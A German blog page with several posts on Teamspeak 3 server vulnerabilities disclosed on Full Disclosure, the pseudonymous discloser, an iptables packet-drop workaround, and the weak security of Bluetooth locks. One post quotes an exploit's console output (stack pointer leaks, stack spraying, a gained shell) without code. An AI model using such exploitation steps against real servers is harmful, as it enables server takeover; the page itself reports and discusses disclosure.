Hanz Jenson Alias ????

Vor einer Woche habe ich auf das Full Disclosure Posting zu dem Teamspeak 3 Schwachstellen hingewiesen. Dabei fiel der vom Poster benutzte Name „Hanz Jenson“. Die Redakteure von Heise.de haben etwas genauer hingeschaut, und einen Alias gefunden „ff214370685e536b9ee021c7ff6b7680bfbe6008bc29f87511b6b90256043536“.

Jetzt bleibt nur noch die Frage : Wer versteckt sich hinter diesem Sha256 Hash ?

Sachdienliche Hinweise dazu nimmt jedes Blog, Heise oder mein Briefkasten auf.

Teamspeak bietet weiterhin keinen Patch für die Lücken an, die der FullDisclosure Poster offengelegt hat. Ganz verstehen tue ich die Geheimniskrämerei nicht, denn die Lücken zu posten ist legitim um sie beseitigt zu bekommen. Natürlich wäre eine Vorab Info an TS schön gewesen. Da aber keine konkreten Exploits aufgetaucht sind, hat der Poster IMHO nichts zu befürchten, denn jeder kann zu Hause seine Programme auf Sicherheitslücken hin abchecken.

Es gibt eigentlich nur zwei Gründe wieso er sich nicht outet: Er arbeitet bei TeamSpeak , oder er hat Angst vor unserem schwammigen Hackerparagraphen. Der Hackerparagraph müßte eh mal vom Bundesverfassungsgericht abgeklopft werden, schliesslich ist in dem viel zu viel Gummi enthalten. Das verstößt sicher gegen EU Regulierungen 😉

Update vom 20.8. :

Es steht eine TeamSpeak 3.0.13.3 Downloaddatei für den Server bereit. Intressanterweise gibt den üblichen Anounce zu dieser Version nicht ( TS3 – Latest News ). Dafür aber in der Bugssektion eine rege Diskussion :

http://forum.teamspeak.com/threads/126508-0-day-vulnerabilities-in-server-3-0-13

Kleinere Zitateauswahl:

Exclamation Teamspeak Server crash   => MergedNext exploit for ver 3.0.12.4 — 3.0,13″

„Hotfix for TeamSpeak vulnerabilities [till 3.0.13]
i tested on my server working crash my server, but i added a line iptables, tools send length 315, i drop this packet on iptables and working for me
-A INPUT -p udp -m udp -j DROP –match length –length 300:350“

 

 

 

Und wieder ist jemand schlauer als die Hacker

Das nächste „Dicke Ding“ mit Bluetooth ist laut der Berliner Morgenpost ein BT Fahrradschloß, daß gegen „Gelegenheitshacker“ helfen soll.

Da es noch keine Schlösser gibt, kann man über den echten Sicherheitsfaktor noch nichts sagen, aber extrapoliert von dem jüngsten BT Schloßskandal, kann es sich eigentlich nur um Tage nach dem Erstverkauf handeln, bis die passende Hackmeldung über die Ticker geht.

Früher oder später geht alles, was man belauschen kann über den digitalen Jordan, wenn man es nicht von wirklichen Kryptoexperten macht läßt. IMHO sind Mechatroniker keine Kryptoexpterten.

Ihr wollt Beispiele ?

VW Funkschlüssel für Autos
Funktastaturen
Bluetooth Türschlösser

kritische Sicherheitslücken in aktuellen Teamspeak 3 Servern

Wie Hanz Jenson auf der Mailingliste Fulldisclosure berichtet/behauptet, hat er 10 kritische Sicherheitslücken gefunden. Eine davon kann genutzt werden um den Server komplett zu übernehmen.

Der Autor will/hat bereits einen funktionierenden Exploit geschrieben/haben:

Here's the output of an exploit which uses two of the vulnerabilities:

	$ python exploit_teamspeak.py
	leaking distinct stack pointers
	 '\xa2'  '\x9a'  '\x8a' . '_' .. '\xa0'
	got a ptr: 0x7fa29a8a5fa0
	 '\xa2'  '\x9a'  '\x9a'  'o' ... '\xa0'
	got a ptr: 0x7fa29a9a6fa0
	 '\xa2'  '\x9a'  '\xaa' . '\x7f'  '\xa0'
	got a ptr: 0x7fa29aaa7fa0
	stack ptr: 0x7fa29a8a5fa0
	assumed stack base: 0x7fa29a5a5000
	sleeping a bit to avoid flood detection.......
	initializing stack sprayers............
	spraying the stacks............
	doing some magic.....

	Got a shell from ('127.0.0.1', 38416)
	ts3@ts3:/home/ts3/teamspeak3-server$

Sollte TeamSpeak die Schwachstellen bestätigen, kann man TS3 Serverbesitzern nur raten den Dienst bis auf weiteres abzuschalten.

Auf Pastebin gibt es das Advisory zu nachlesen.